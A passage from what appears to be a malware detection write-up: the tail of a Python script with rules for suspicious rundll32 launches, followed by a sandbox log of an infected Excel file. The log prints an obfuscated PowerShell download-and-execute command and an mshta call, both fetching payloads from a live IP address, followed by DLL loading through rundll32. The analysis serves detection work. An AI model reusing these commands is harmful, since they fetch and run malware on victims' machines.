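    if "rundll32.exe" in low:
        target = rundll32_target(cl)
        if target:
            module, export = target
            ml = module.lower()
            # Module in a user-writable directory, or with a non-module extension (.rxn, .nlm)
            if ml.startswith(USER_WRITABLE) or not ml.endswith(MODULE_EXTS):
                hits.append("rundll32_untrusted_module")
            if export.lower() == "dllregisterserver" and parent == "rundll32.exe" and image == "rundll32.exe":
                hits.append("rundll32_reexec_dllregisterserver")
    return hits


def evaluate_all(events: list) -> list:
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, evaluate_all(SAMPLE_EVENTS)):
        print(basename(event["parent"]), "->", basename(event["image"]), hits)
```

Every link of the recorded chain trips at least one rule while the two benign events trip none; in practice the rundll32 module check is the one that also catches the later stages (the .rxn and .nlm copies under SysWOW64), since by then the parent is rundll32.exe itself and the Office and mshta rules no longer apply.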
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 476C.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038808D0 push 8B49032Eh; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038800BE push 8B49032Eh; iretd
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x9130d
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1976 - Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe - API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe - API call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe - File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_00694087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 13_2_00234087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 14_2_00314087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 15_2_00404087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\System32\mshta.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exe - Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: Yara match - File source: CJ68000754184.xls, type: SAMPLE
                            Source: Yara match - File source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exe - Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe - Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe - Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exe - Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exe - Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            Source: Yara match - File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
